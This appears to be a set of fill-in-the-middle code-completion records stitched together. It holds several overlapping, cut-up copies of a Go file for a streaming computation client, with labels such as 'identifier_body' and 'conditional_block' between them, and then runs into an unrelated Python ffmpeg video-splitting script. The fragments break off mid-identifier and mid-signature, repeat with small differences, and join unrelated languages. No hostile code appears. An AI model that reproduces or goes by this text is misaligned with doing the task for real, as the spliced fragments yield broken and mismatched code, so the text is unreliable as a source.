c.limitSize.Set(v.MessageBlock.Contents.(messages.FindLimitedResultSetContents).LimitSize())
case messages.FindMatchedNoTimeseries:
c.matchedNoTimeseriesQuery.Set(v.MessageBlock.Contents.(messages.FindMatchedNoTimeseriesContents).MatchedNoTimeseriesQuery())
case messages.GroupByMissingProperty:
c.groupByMissingProperties.Set(v.MessageBlock.Contents.(messages.GroupByMissingPropertyContents).GroupByMissingProperties())
}
case *messages.ErrorMessage:
rawData := v.RawData()
computationError := ComputationError{}
if code, ok := rawData["error"]; ok {
computationError.Code = int(code.(float64))
}
if msg, ok := rawData["message"]; ok && msg != nil {
computationError.Message = msg.(string)
}
if errType, ok := rawData["errorType"]; ok {
computationError.ErrorType = errType.(string)
}
return &computationError
case *messages.MetadataMessage:
c.Lock()
if _, ok := c.tsidMetadata[v.TSID]; !ok {
c.tsidMetadata[v.TSID] = &asyncMetadata[*messages.MetadataProperties]{}
}
c.tsidMetadata[v.TSID].Set(&v.Properties)
c.Unlock()
case *messages.EventMessage:
c.eventChBuffer <- v
}
return nil
}
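// bufferMessages bridges the in and out channels with an unbounded in-memory buffer so
// that a slow consumer never blocks the producer; once in is closed, any buffered
// messages are flushed to out before out is closed.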
func bufferMessages[T any](in chan *T, out chan *T) {
buffer := make([]*T, 0)
var nextMessage *T
defer func() {
if nextMessage != nil {
out <- nextMessage
}
for i := range buffer {
out <- buffer[i]
}
close(out)
}()
for {
if len(buffer) > 0 {
if nextMessage == nil {
nextMessage, buffer = buffer[0], buffer[1:]
}
select {
case out <- nextMessage:
nextMessage = nil
case msg, ok := <-in:
if !ok {
return
}
buffer = append(buffer, msg)
}
} else {
msg, ok := <-in
if !ok {
return
}
buffer = append(buffer, msg)
}
}
}
// Data returns the channel on which data messages come. This channel will be closed when the
// computation is finished. To prevent goroutine leaks, you should read all messages from this
// channel until it is closed.
func (c *Computation) Data() <-chan *messages.DataMessage {
return c.dataCh
}
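// drainDataExample is an illustrative helper, not part of the original API: it shows one
// way to consume every data message until the computation finishes, which avoids leaking
// the buffering goroutine behind Data().
func drainDataExample(c *Computation, handle func(*messages.DataMessage)) {
	for msg := range c.Data() {
		handle(msg)
	}
}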
// Expirations returns a channel that will be sent messages about expired TSIDs, i.e. time series
// that are no longer valid for this computation. This channel will be
|
}
if e.Message != "" {
err = fmt.Sprintf("%v: %v", err, e.Message)
|
random_line_split
|
computation.go
|
limitSize asyncMetadata[int]
matchedNoTimeseriesQuery asyncMetadata[string]
groupByMissingProperties asyncMetadata[[]string]
tsidMetadata map[idtool.ID]*asyncMetadata[*messages.MetadataProperties]
}
// ComputationError exposes the underlying metadata of a computation error
type ComputationError struct {
Code int
Message string
ErrorType string
}
func (e *ComputationError) Error() string {
err := fmt.Sprintf("%v", e.Code)
if e.ErrorType != "" {
err = fmt.Sprintf("%v (%v)", e.Code, e.ErrorType)
}
if e.Message != "" {
err = fmt.Sprintf("%v: %v", err, e.Message)
}
return err
}
func newComputation(channel <-chan messages.Message, name string, client *Client) *Computation {
comp := &Computation{
channel: channel,
name: name,
client: client,
dataCh: make(chan *messages.DataMessage),
dataChBuffer: make(chan *messages.DataMessage),
eventCh: make(chan *messages.EventMessage),
eventChBuffer: make(chan *messages.EventMessage),
expirationCh: make(chan *messages.ExpiredTSIDMessage),
expirationChBuffer: make(chan *messages.ExpiredTSIDMessage),
tsidMetadata: make(map[idtool.ID]*asyncMetadata[*messages.MetadataProperties]),
}
go bufferMessages(comp.dataChBuffer, comp.dataCh)
go bufferMessages(comp.expirationChBuffer, comp.expirationCh)
go bufferMessages(comp.eventChBuffer, comp.eventCh)
go func() {
err := comp.watchMessages()
if !errors.Is(err, errChannelClosed) {
comp.errMutex.Lock()
comp.lastError = err
comp.errMutex.Unlock()
}
comp.shutdown()
}()
return comp
}
// Handle of the computation. Will wait as long as the given ctx is not closed. If ctx is closed an
// error will be returned.
func (c *Computation) Handle(ctx context.Context) (string, error) {
return c.handle.Get(ctx)
}
// Resolution of the job. Will wait as long as the given ctx is not closed. If ctx is closed an
// error will be returned.
func (c *Computation) Resolution(ctx context.Context) (time.Duration, error) {
resMS, err := c.resolutionMS.Get(ctx)
return time.Duration(resMS) * time.Millisecond, err
}
// Lag detected for the job. Will wait as long as the given ctx is not closed. If ctx is closed an
// error will be returned.
func (c *Computation) Lag(ctx context.Context) (time.Duration, error) {
lagMS, err := c.lagMS.Get(ctx)
return time.Duration(lagMS) * time.Millisecond, err
}
// MaxDelay detected for the job. Will wait as long as the given ctx is not closed. If ctx is closed an
// error will be returned.
func (c *Computation) MaxDelay(ctx context.Context) (time.Duration, error) {
maxDelayMS, err := c.maxDelayMS.Get(ctx)
return time.Duration(maxDelayMS) * time.Millisecond, err
}
// MatchedSize detected for the job. Will wait as long as the given ctx is not closed. If ctx is closed an
// error will be returned.
func (c *Computation) MatchedSize(ctx context.Context) (int, error) {
return c.matchedSize.Get(ctx)
}
// LimitSize detected for the job. Will wait as long as the given ctx is not closed. If ctx is closed an
// error will be returned.
func (c *Computation) LimitSize(ctx context.Context) (int, error) {
return c.limitSize.Get(ctx)
}
// MatchedNoTimeseriesQuery if it matched no active timeseries. Will wait as long as the given ctx
// is not closed. If ctx is closed an error will be returned.
func (c *Computation) MatchedNoTimeseriesQuery(ctx context.Context) (string, error) {
return c.matchedNoTimeseriesQuery.Get(ctx)
}
// GroupByMissingProperties are timeseries that don't contain the required dimensions. Will wait as
// long as the given ctx is not closed. If ctx is closed an error will be returned.
func (c *Computation) GroupByMissingProperties(ctx context.Context) ([]string, error) {
return c.groupByMissingProperties.Get(ctx)
}
// TSIDMetadata for a particular tsid. Will wait as long as the given ctx is not closed. If ctx is closed an
// error will be returned.
func (c *Computation) TSIDMetadata(ctx context.Context, tsid idtool.ID) (*messages.MetadataProperties, error) {
c.Lock()
if _, ok := c.tsidMetadata[tsid]; !ok {
c.tsidMetadata[tsid] = &asyncMetadata[*messages.MetadataProperties]{}
}
md := c.tsidMetadata[tsid]
c.Unlock()
return md.Get(ctx)
}
// Err returns the last fatal error that caused the computation to stop, if
// any. Will be nil if the computation stopped in an expected manner.
func (c *Computation) Err() error {
c.errMutex.RLock()
defer c.errMutex.RUnlock()
return c.lastError
}
func (c *Computation) watchMessages() error {
for {
m, ok := <-c.channel
if !ok {
return nil
}
if err := c.processMessage(m); err != nil {
return err
}
}
}
var errChannelClosed = errors.New("computation channel is closed")
func (c *Computation) processMessage(m messages.Message) error
|
c.maxDelayMS.Set(v.MessageBlock.Contents.(messages.JobInitialMaxDelayContents).MaxDelayMS())
case messages.FindLimitedResultSet:
c.matchedSize.Set(v.MessageBlock.Contents.(messages.FindLimitedResultSetContents).MatchedSize())
c.limitSize.Set(v.MessageBlock.Contents.(messages.FindLimitedResultSetContents).LimitSize())
case messages.FindMatchedNoTimeseries:
c.matchedNoTimeseriesQuery.Set(v.MessageBlock.Contents.(messages.FindMatchedNoTimeseriesContents).MatchedNoTimeseriesQuery())
case messages.GroupByMissingProperty:
c.groupByMissingProperties.Set(v.MessageBlock.Contents.(messages.GroupByMissingPropertyContents).GroupByMissingProperties())
}
case *messages.ErrorMessage:
rawData := v.RawData()
computationError := ComputationError{}
if code, ok := rawData["error"]; ok {
computationError.Code = int(code.(float64))
}
if msg, ok := rawData["message"]; ok && msg != nil {
computationError.Message = msg.(string)
}
if errType, ok := rawData["errorType"]; ok {
computationError.ErrorType = errType.(string)
}
return &computationError
case *messages.MetadataMessage:
c.Lock()
if _, ok := c.tsidMetadata[v.TSID]; !ok {
c.tsidMetadata[v.TSID] = &asyncMetadata[*messages.MetadataProperties]{}
}
c.tsidMetadata[v.TSID].Set(&v.Properties)
c.Unlock()
case *messages.EventMessage:
c.eventChBuffer <- v
}
return nil
}
func bufferMessages[T any](in chan *T, out chan *T) {
buffer := make([]*T, 0)
var nextMessage *T
defer func() {
if nextMessage != nil {
out <- nextMessage
}
for i := range buffer {
out <- buffer[i]
}
close(out)
}()
for {
if len(buffer) > 0 {
if nextMessage == nil {
nextMessage, buffer = buffer[0], buffer[1:]
}
select {
case out <- nextMessage:
nextMessage = nil
case msg, ok := <-in:
if !ok {
return
}
buffer = append(buffer, msg)
}
} else {
msg, ok := <-in
if !ok {
return
}
buffer = append(buffer, msg)
}
}
}
// Data returns the channel on which data messages come. This channel will be closed when the
// computation is finished. To prevent goroutine leaks, you should read all messages from this
// channel until it is closed.
func (c *Computation) Data() <-chan *messages.DataMessage {
return c.dataCh
}
// Expirations returns a channel that will be sent messages about expired TSIDs, i.e. time series
// that are no longer valid for this computation. This channel will
|
{
switch v := m.(type) {
case *messages.JobStartControlMessage:
c.handle.Set(v.Handle)
case *messages.EndOfChannelControlMessage, *messages.ChannelAbortControlMessage:
return errChannelClosed
case *messages.DataMessage:
c.dataChBuffer <- v
case *messages.ExpiredTSIDMessage:
c.Lock()
delete(c.tsidMetadata, idtool.IDFromString(v.TSID))
c.Unlock()
c.expirationChBuffer <- v
case *messages.InfoMessage:
switch v.MessageBlock.Code {
case messages.JobRunningResolution:
c.resolutionMS.Set(v.MessageBlock.Contents.(messages.JobRunningResolutionContents).ResolutionMS())
case messages.JobDetectedLag:
c.lagMS.Set(v.MessageBlock.Contents.(messages.JobDetectedLagContents).LagMS())
case messages.JobInitialMaxDelay:
|
identifier_body
|
computation.go
|
imitSize asyncMetadata[int]
matchedNoTimeseriesQuery asyncMetadata[string]
groupByMissingProperties asyncMetadata[[]string]
tsidMetadata map[idtool.ID]*asyncMetadata[*messages.MetadataProperties]
}
// ComputationError exposes the underlying metadata of a computation error
type ComputationError struct {
Code int
Message string
ErrorType string
}
func (e *ComputationError) Error() string {
err := fmt.Sprintf("%v", e.Code)
if e.ErrorType != "" {
err = fmt.Sprintf("%v (%v)", e.Code, e.ErrorType)
}
if e.Message != "" {
err = fmt.Sprintf("%v: %v", err, e.Message)
}
return err
}
func newComputation(channel <-chan messages.Message, name string, client *Client) *Computation {
comp := &Computation{
channel: channel,
name: name,
client: client,
dataCh: make(chan *messages.DataMessage),
dataChBuffer: make(chan *messages.DataMessage),
eventCh: make(chan *messages.EventMessage),
eventChBuffer: make(chan *messages.EventMessage),
expirationCh: make(chan *messages.ExpiredTSIDMessage),
expirationChBuffer: make(chan *messages.ExpiredTSIDMessage),
tsidMetadata: make(map[idtool.ID]*asyncMetadata[*messages.MetadataProperties]),
}
go bufferMessages(comp.dataChBuffer, comp.dataCh)
go bufferMessages(comp.expirationChBuffer, comp.expirationCh)
go bufferMessages(comp.eventChBuffer, comp.eventCh)
go func() {
err := comp.watchMessages()
if !errors.Is(err, errChannelClosed) {
comp.errMutex.Lock()
comp.lastError = err
comp.errMutex.Unlock()
}
comp.shutdown()
}()
return comp
}
// Handle of the computation. Will wait as long as the given ctx is not closed. If ctx is closed an
// error will be returned.
func (c *Computation) Handle(ctx context.Context) (string, error) {
return c.handle.Get(ctx)
}
// Resolution of the job. Will wait as long as the given ctx is not closed. If ctx is closed an
// error will be returned.
func (c *Computation) Resolution(ctx context.Context) (time.Duration, error) {
resMS, err := c.resolutionMS.Get(ctx)
return time.Duration(resMS) * time.Millisecond, err
}
// Lag detected for the job. Will wait as long as the given ctx is not closed. If ctx is closed an
// error will be returned.
func (c *Computation) Lag(ctx context.Context) (time.Duration, error) {
lagMS, err := c.lagMS.Get(ctx)
return time.Duration(lagMS) * time.Millisecond, err
}
// MaxDelay detected for the job. Will wait as long as the given ctx is not closed. If ctx is closed an
// error will be returned.
func (c *Computation) MaxDelay(ctx context.Context) (time.Duration, error) {
maxDelayMS, err := c.maxDelayMS.Get(ctx)
return time.Duration(maxDelayMS) * time.Millisecond, err
}
// MatchedSize detected for the job. Will wait as long as the given ctx is not closed. If ctx is closed an
// error will be returned.
func (c *Computation) MatchedSize(ctx context.Context) (int, error) {
return c.matchedSize.Get(ctx)
}
// LimitSize detected for the job. Will wait as long as the given ctx is not closed. If ctx is closed an
// error will be returned.
func (c *Computation) LimitSize(ctx context.Context) (int, error) {
return c.limitSize.Get(ctx)
}
// MatchedNoTimeseriesQuery if it matched no active timeseries. Will wait as long as the given ctx
// is not closed. If ctx is closed an error will be returned.
func (c *Computation) MatchedNoTimeseriesQuery(ctx context.Context) (string, error) {
return c.matchedNoTimeseriesQuery.Get(ctx)
}
// GroupByMissingProperties are timeseries that don't contain the required dimensions. Will wait as
// long as the given ctx is not closed. If ctx is closed an error will be returned.
func (c *Computation) GroupByMissingProperties(ctx context.Context) ([]string, error) {
return c.groupByMissingProperties.Get(ctx)
}
// TSIDMetadata for a particular tsid. Will wait as long as the given ctx is not closed. If ctx is closed an
// error will be returned.
func (c *Computation) TSIDMetadata(ctx context.Context, tsid idtool.ID) (*messages.MetadataProperties, error) {
c.Lock()
if _, ok := c.tsidMetadata[tsid]; !ok {
c.tsidMetadata[tsid] = &asyncMetadata[*messages.MetadataProperties]{}
}
md := c.tsidMetadata[tsid]
c.Unlock()
return md.Get(ctx)
}
// Err returns the last fatal error that caused the computation to stop, if
// any. Will be nil if the computation stopped in an expected manner.
func (c *Computation) Err() error {
c.errMutex.RLock()
defer c.errMutex.RUnlock()
return c.lastError
}
func (c *Computation) watchMessages() error {
for {
m, ok := <-c.channel
if !ok {
return nil
}
if err := c.processMessage(m); err != nil {
return err
}
}
}
var errChannelClosed = errors.New("computation channel is closed")
func (c *Computation) processMessage(m messages.Message) error {
switch v := m.(type) {
case *messages.JobStartControlMessage:
c.handle.Set(v.Handle)
case *messages.EndOfChannelControlMessage, *messages.ChannelAbortControlMessage:
return errChannelClosed
case *messages.DataMessage:
c.dataChBuffer <- v
case *messages.ExpiredTSIDMessage:
c.Lock()
delete(c.tsidMetadata, idtool.IDFromString(v.TSID))
c.Unlock()
c.expirationChBuffer <- v
case *messages.InfoMessage:
switch v.MessageBlock.Code {
case messages.JobRunningResolution:
c.resolutionMS.Set(v.MessageBlock.Contents.(messages.JobRunningResolutionContents).ResolutionMS())
case messages.JobDetectedLag:
c.lagMS.Set(v.MessageBlock.Contents.(messages.JobDetectedLagContents).LagMS())
case messages.JobInitialMaxDelay:
c.maxDelayMS.Set(v.MessageBlock.Contents.(messages.JobInitialMaxDelayContents).MaxDelayMS())
case messages.FindLimitedResultSet:
c.matchedSize.Set(v.MessageBlock.Contents.(messages.FindLimitedResultSetContents).MatchedSize())
c.limitSize.Set(v.MessageBlock.Contents.(messages.FindLimitedResultSetContents).LimitSize())
case messages.FindMatchedNoTimeseries:
c.matchedNoTimeseriesQuery.Set(v.MessageBlock.Contents.(messages.FindMatchedNoTimeseriesContents).MatchedNoTimeseriesQuery())
case messages.GroupByMissingProperty:
c.groupByMissingProperties.Set(v.MessageBlock.Contents.(messages.GroupByMissingPropertyContents).GroupByMissingProperties())
}
case *messages.ErrorMessage:
rawData := v.RawData()
computationError := ComputationError{}
if code, ok := rawData["error"]; ok {
computationError.Code = int(code.(float64))
}
if msg, ok := rawData["message"]; ok && msg != nil {
computationError.Message = msg.(string)
}
if errType, ok := rawData["errorType"]; ok {
computationError.ErrorType = errType.(string)
}
return &computationError
case *messages.MetadataMessage:
c.Lock()
if _, ok := c.tsidMetadata[v.TSID]; !ok
|
c.tsidMetadata[v.TSID].Set(&v.Properties)
c.Unlock()
case *messages.EventMessage:
c.eventChBuffer <- v
}
return nil
}
func bufferMessages[T any](in chan *T, out chan *T) {
buffer := make([]*T, 0)
var nextMessage *T
defer func() {
if nextMessage != nil {
out <- nextMessage
}
for i := range buffer {
out <- buffer[i]
}
close(out)
}()
for {
if len(buffer) > 0 {
if nextMessage == nil {
nextMessage, buffer = buffer[0], buffer[1:]
}
select {
case out <- nextMessage:
nextMessage = nil
case msg, ok := <-in:
if !ok {
return
}
buffer = append(buffer, msg)
}
} else {
msg, ok := <-in
if !ok {
return
}
buffer = append(buffer, msg)
}
}
}
// Data returns the channel on which data messages come. This channel will be closed when the
// computation is finished. To prevent goroutine leaks, you should read all messages from this
// channel until it is closed.
func (c *Computation) Data() <-chan *messages.DataMessage {
return c.dataCh
}
// Expirations returns a channel that will be sent messages about expired TSIDs, i.e. time series
// that are no longer valid for this computation. This channel will
|
{
c.tsidMetadata[v.TSID] = &asyncMetadata[*messages.MetadataProperties]{}
}
|
conditional_block
|
computation.go
|
limitSize asyncMetadata[int]
matchedNoTimeseriesQuery asyncMetadata[string]
groupByMissingProperties asyncMetadata[[]string]
tsidMetadata map[idtool.ID]*asyncMetadata[*messages.MetadataProperties]
}
// ComputationError exposes the underlying metadata of a computation error
type ComputationError struct {
Code int
Message string
ErrorType string
}
func (e *ComputationError) Error() string {
err := fmt.Sprintf("%v", e.Code)
if e.ErrorType != "" {
err = fmt.Sprintf("%v (%v)", e.Code, e.ErrorType)
}
if e.Message != "" {
err = fmt.Sprintf("%v: %v", err, e.Message)
}
return err
}
func newComputation(channel <-chan messages.Message, name string, client *Client) *Computation {
comp := &Computation{
channel: channel,
name: name,
client: client,
dataCh: make(chan *messages.DataMessage),
dataChBuffer: make(chan *messages.DataMessage),
eventCh: make(chan *messages.EventMessage),
eventChBuffer: make(chan *messages.EventMessage),
expirationCh: make(chan *messages.ExpiredTSIDMessage),
expirationChBuffer: make(chan *messages.ExpiredTSIDMessage),
tsidMetadata: make(map[idtool.ID]*asyncMetadata[*messages.MetadataProperties]),
}
go bufferMessages(comp.dataChBuffer, comp.dataCh)
go bufferMessages(comp.expirationChBuffer, comp.expirationCh)
go bufferMessages(comp.eventChBuffer, comp.eventCh)
go func() {
err := comp.watchMessages()
if !errors.Is(err, errChannelClosed) {
comp.errMutex.Lock()
comp.lastError = err
comp.errMutex.Unlock()
}
comp.shutdown()
}()
return comp
}
// Handle of the computation. Will wait as long as the given ctx is not closed. If ctx is closed an
// error will be returned.
func (c *Computation) Handle(ctx context.Context) (string, error) {
return c.handle.Get(ctx)
}
// Resolution of the job. Will wait as long as the given ctx is not closed. If ctx is closed an
// error will be returned.
func (c *Computation) Resolution(ctx context.Context) (time.Duration, error) {
resMS, err := c.resolutionMS.Get(ctx)
return time.Duration(resMS) * time.Millisecond, err
}
// Lag detected for the job. Will wait as long as the given ctx is not closed. If ctx is closed an
// error will be returned.
func (c *Computation) Lag(ctx context.Context) (time.Duration, error) {
lagMS, err := c.lagMS.Get(ctx)
return time.Duration(lagMS) * time.Millisecond, err
}
// MaxDelay detected for the job. Will wait as long as the given ctx is not closed. If ctx is closed an
// error will be returned.
func (c *Computation)
|
(ctx context.Context) (time.Duration, error) {
maxDelayMS, err := c.maxDelayMS.Get(ctx)
return time.Duration(maxDelayMS) * time.Millisecond, err
}
// MatchedSize detected for the job. Will wait as long as the given ctx is not closed. If ctx is closed an
// error will be returned.
func (c *Computation) MatchedSize(ctx context.Context) (int, error) {
return c.matchedSize.Get(ctx)
}
// LimitSize detected for the job. Will wait as long as the given ctx is not closed. If ctx is closed an
// error will be returned.
func (c *Computation) LimitSize(ctx context.Context) (int, error) {
return c.limitSize.Get(ctx)
}
// MatchedNoTimeseriesQuery if it matched no active timeseries. Will wait as long as the given ctx
// is not closed. If ctx is closed an error will be returned.
func (c *Computation) MatchedNoTimeseriesQuery(ctx context.Context) (string, error) {
return c.matchedNoTimeseriesQuery.Get(ctx)
}
// GroupByMissingProperties are timeseries that don't contain the required dimensions. Will wait as
// long as the given ctx is not closed. If ctx is closed an error will be returned.
func (c *Computation) GroupByMissingProperties(ctx context.Context) ([]string, error) {
return c.groupByMissingProperties.Get(ctx)
}
// TSIDMetadata for a particular tsid. Will wait as long as the given ctx is not closed. If ctx is closed an
// error will be returned.
func (c *Computation) TSIDMetadata(ctx context.Context, tsid idtool.ID) (*messages.MetadataProperties, error) {
c.Lock()
if _, ok := c.tsidMetadata[tsid]; !ok {
c.tsidMetadata[tsid] = &asyncMetadata[*messages.MetadataProperties]{}
}
md := c.tsidMetadata[tsid]
c.Unlock()
return md.Get(ctx)
}
// Err returns the last fatal error that caused the computation to stop, if
// any. Will be nil if the computation stopped in an expected manner.
func (c *Computation) Err() error {
c.errMutex.RLock()
defer c.errMutex.RUnlock()
return c.lastError
}
func (c *Computation) watchMessages() error {
for {
m, ok := <-c.channel
if !ok {
return nil
}
if err := c.processMessage(m); err != nil {
return err
}
}
}
var errChannelClosed = errors.New("computation channel is closed")
func (c *Computation) processMessage(m messages.Message) error {
switch v := m.(type) {
case *messages.JobStartControlMessage:
c.handle.Set(v.Handle)
case *messages.EndOfChannelControlMessage, *messages.ChannelAbortControlMessage:
return errChannelClosed
case *messages.DataMessage:
c.dataChBuffer <- v
case *messages.ExpiredTSIDMessage:
c.Lock()
delete(c.tsidMetadata, idtool.IDFromString(v.TSID))
c.Unlock()
c.expirationChBuffer <- v
case *messages.InfoMessage:
switch v.MessageBlock.Code {
case messages.JobRunningResolution:
c.resolutionMS.Set(v.MessageBlock.Contents.(messages.JobRunningResolutionContents).ResolutionMS())
case messages.JobDetectedLag:
c.lagMS.Set(v.MessageBlock.Contents.(messages.JobDetectedLagContents).LagMS())
case messages.JobInitialMaxDelay:
c.maxDelayMS.Set(v.MessageBlock.Contents.(messages.JobInitialMaxDelayContents).MaxDelayMS())
case messages.FindLimitedResultSet:
c.matchedSize.Set(v.MessageBlock.Contents.(messages.FindLimitedResultSetContents).MatchedSize())
c.limitSize.Set(v.MessageBlock.Contents.(messages.FindLimitedResultSetContents).LimitSize())
case messages.FindMatchedNoTimeseries:
c.matchedNoTimeseriesQuery.Set(v.MessageBlock.Contents.(messages.FindMatchedNoTimeseriesContents).MatchedNoTimeseriesQuery())
case messages.GroupByMissingProperty:
c.groupByMissingProperties.Set(v.MessageBlock.Contents.(messages.GroupByMissingPropertyContents).GroupByMissingProperties())
}
case *messages.ErrorMessage:
rawData := v.RawData()
computationError := ComputationError{}
if code, ok := rawData["error"]; ok {
computationError.Code = int(code.(float64))
}
if msg, ok := rawData["message"]; ok && msg != nil {
computationError.Message = msg.(string)
}
if errType, ok := rawData["errorType"]; ok {
computationError.ErrorType = errType.(string)
}
return &computationError
case *messages.MetadataMessage:
c.Lock()
if _, ok := c.tsidMetadata[v.TSID]; !ok {
c.tsidMetadata[v.TSID] = &asyncMetadata[*messages.MetadataProperties]{}
}
c.tsidMetadata[v.TSID].Set(&v.Properties)
c.Unlock()
case *messages.EventMessage:
c.eventChBuffer <- v
}
return nil
}
func bufferMessages[T any](in chan *T, out chan *T) {
buffer := make([]*T, 0)
var nextMessage *T
defer func() {
if nextMessage != nil {
out <- nextMessage
}
for i := range buffer {
out <- buffer[i]
}
close(out)
}()
for {
if len(buffer) > 0 {
if nextMessage == nil {
nextMessage, buffer = buffer[0], buffer[1:]
}
select {
case out <- nextMessage:
nextMessage = nil
case msg, ok := <-in:
if !ok {
return
}
buffer = append(buffer, msg)
}
} else {
msg, ok := <-in
if !ok {
return
}
buffer = append(buffer, msg)
}
}
}
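// Note on the buffering above: the select lets bufferMessages keep draining `in`
// even when the consumer of `out` is slow, so the websocket reader never blocks;
// the deferred flush delivers whatever is still buffered once `in` is closed and
// then closes `out`.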
// Data returns the channel on which data messages come. This channel will be closed when the
// computation is finished. To prevent goroutine leaks, you should read all messages from this
// channel until it is closed.
func (c *Computation) Data() <-chan *messages.DataMessage {
return c.dataCh
}
// Expirations returns a channel that will be sent messages about expired TSIDs, i.e. time series
// that are no longer valid for this computation. This channel will
|
MaxDelay
|
identifier_name
|
ffmpeg_video_splitter.py
|
Command(self,ffmpeg_cmd):
ffmpeg_cmd = ffmpeg_cmd.replace("'", "\"")
self.ffmpeg_cmd_line.append(ffmpeg_cmd)
def AddFFMpegFilterComplex(self,filter_complex_option):
self.filter_complex_list.append(filter_complex_option)
def GetTimeDiff(dt_start, dt_end):
time_difference = dt_end.total_seconds() - dt_start.total_seconds()
if time_difference <= 0:
raise Exception("Time difference less than 0: " + str(time_difference))
return datetime.timedelta(seconds=time_difference)
def ConvertTimestampToTimeDelta(timestamp_str):
time_split = timestamp_str.split(":")
time_split.reverse()
total_seconds = float(time_split[0])
for index in range(1, len(time_split)):
total_seconds += int(time_split[index]) * (60 ** index)
time_dt = datetime.timedelta(seconds=total_seconds)
return time_dt
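# Worked example (illustrative value): ConvertTimestampToTimeDelta("1:02:03.5")
# reverses the split into ["03.5", "02", "1"] and weights each field by 60**index,
# giving 3.5 + 2*60 + 1*3600 = 3723.5 seconds -> datetime.timedelta(seconds=3723.5).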
def ConvertToDateTime(datetime_str):
date, time = datetime_str.split(" ", 1)
year, month, day = date.split('-')
hour, minute, second = time.split('-')
date_time = datetime.datetime(int(year), int(month), int(day), int(hour), int(minute), int(second))
return date_time
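# Worked example (illustrative value): the expected format is "YYYY-MM-DD HH-MM-SS",
# so ConvertToDateTime("2021-05-01 13-45-00") yields datetime.datetime(2021, 5, 1, 13, 45, 0).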
def CreateDirectory(directory):
if not os.path.exists(directory):
os.makedirs(directory)
def RemoveDirectory(directory):
if os.path.isdir(directory):
shutil.rmtree(directory)
def DeleteFile( path ):
try:
os.remove(path)
except FileNotFoundError:
pass
def ParseConfig( config_blocks, base_output_folder, config_folder ):
if verbose:
print( "Parsing Config" )
full_root_folder = config_folder
full_output_folder = base_output_folder
force_file_ext = False
time_stamp = None
video_list = []
for block_obj in config_blocks:
if block_obj.key == "$base_output_folder" or block_obj.key == "$output_folder":
base_output_folder = os.path.normpath( block_obj.value ) + os.sep
full_output_folder = base_output_folder
elif block_obj.key == "$append_output_folder":
if os.path.isabs( block_obj.value ):
full_output_folder = os.path.normpath( block_obj.value )
else:
full_output_folder = os.path.normpath( base_output_folder + block_obj.value )
elif block_obj.key == "$force_file_ext":
force_file_ext = block_obj.value
elif block_obj.key == "$include":
include_config = lexer.ReadFile(block_obj.value)
config_path = os.path.join(full_root_folder, os.path.split(block_obj.value)[0])
include_video_list, base_output_folder = ParseConfig(include_config, base_output_folder, config_path)
video_list.extend(include_video_list)
elif block_obj.key in {"$input_video_folder", "$input_folder"}:
if os.path.isabs( block_obj.value ):
full_root_folder = os.path.normpath( block_obj.value ) + os.sep
else:
full_root_folder = os.path.normpath( config_folder + block_obj.value ) + os.sep
# is a video file
else:
video_file = VideoFile( block_obj.key, full_root_folder, config_folder,
full_output_folder, force_file_ext )
if block_obj.items:
AddInputVideosToVideo( video_file, block_obj )
video_list.append(video_file)
video_file.crc_list.append(GetCRC(base_output_folder))
video_file.crc_list.append(GetCRC(str(final_encode)))
if not os.path.isfile(video_file.full_path):
continue
elif not CheckCRC(video_file, video_file.crc_list):
video_file.skip = True
return video_list, base_output_folder
def AddInputVideosToVideo( video_file, block_obj ):
for input_video_block in block_obj.items:
crc_list = []
input_video_block.key = os.path.normpath( input_video_block.key )
if input_video_block.key == "$time":
# TODO: maybe if the value is 'self', use the input video date modified?
|
# and what if there is more than one video?
time_stamp = ConvertToDateTime(input_video_block.value)
video_file.time = time_stamp
elif input_video_block.key == "$ffmpeg_cmd":
video_file.global_ffmpeg_cmd.append(input_video_block.value)
crc_list.append(GetCRC(input_video_block.value))
elif input_video_block.key == "$no_filter_complex_default":
video_file.use_filter_complex_default = False
elif input_video_block.key == "$filter_complex":
video_file.global_filter_complex.append(input_video_block.value)
crc_list.append(GetCRC(input_video_block.value))
elif ":" in input_video_block.key and not os.sep in input_video_block.key:
video_file.AddInputVideo( video_file.raw_path )
crc_list.append( GetCRC(video_file.raw_path) )
crc_list = AddInputVideoSetting( video_file, input_video_block, crc_list )
else:
video_file.AddInputVideo(input_video_block.key, False)
for in_video_item in input_video_block.items:
crc_list = AddInputVideoSetting( video_file, in_video_item, crc_list )
video_file.crc_list.extend( crc_list )
return
def AddInputVideoSetting( video_file, in_video_item, crc_list ):
if in_video_item.key == "$ffmpeg_cmd":
video_file.AddFFMpegCommand(in_video_item.value)
crc_list.append(GetCRC(in_video_item.value))
elif in_video_item.key == "$filter_complex":
video_file.AddFFMpegFilterComplex(in_video_item.value)
crc_list.append(GetCRC(in_video_item.value))
else:
video_file.AddTimeRange(in_video_item.key, in_video_item.value)
crc_list.append(GetCRC(in_video_item.key))
crc_list.append(GetCRC(in_video_item.value))
return crc_list
# some shitty thing to print what we just parsed
def PrintTimestampsFile( video_list, out_folder ):
cmd_bar_line = "-----------------------------------------------------------"
print( cmd_bar_line )
if verbose:
print( "Timestamps File" )
print( cmd_bar_line )
for out_video in video_list:
print( out_video.path )
for in_video in out_video.input_videos:
print( " " + in_video.raw_path )
for time_range in in_video.time_ranges:
print( " " + str(time_range[0]) + " - " + str(time_range[1]) )
print( "" )
print( "Default Output Folder: " + out_folder )
if final_encode:
print( "Final Encode - Using H265 - CRF 8 - Slow Preset" )
else:
print( "Quick Encode - Using H264 - CRF 24 - Ultrafast Preset" )
print( cmd_bar_line )
return
def RunFFMpegConCat(temp_path, sub_video_list, out_video):
# stuff for ffmpeg concat shit
temp_file = temp_path + "temp.txt"
with open(temp_file, "w", encoding="utf-8") as temp_file_io:
for sub_video in sub_video_list:
temp_file_io.write("file '" + sub_video + "'\n")
metadata = []
if out_video.time:
metadata.append('-metadata date="' + str(out_video.time).replace(':', '-') + '"')
ffmpeg_command = (
ffmpeg_bin + "ffmpeg -y -hide_banner",
"-safe 0 -f concat -i \"" + temp_file + '"',
"-c copy -map 0",
*metadata,
'"' + out_video.full_path + '"'
)
RunFFMpeg(out_video.full_path, ' '.join(ffmpeg_command))
if verbose:
print("Created Output Video")
if out_video.time:
ReplaceDateModified(out_video.full_path, out_video.time.timestamp())
if verbose:
print("Changed Date Modified")
os.remove(temp_file)
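# Note on the concat step above: the generated temp.txt is a plain ffmpeg concat
# listing with one clip per line, e.g.
#   file 'TEMP/.../0.mkv'
#   file 'TEMP/.../1.mkv'
# and "-safe 0 -f concat -i temp.txt -c copy" then joins the clips without re-encoding.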
def RunFFMpegSubVideo( time_range_number, input_video, temp_video, use_filter_complex_default ):
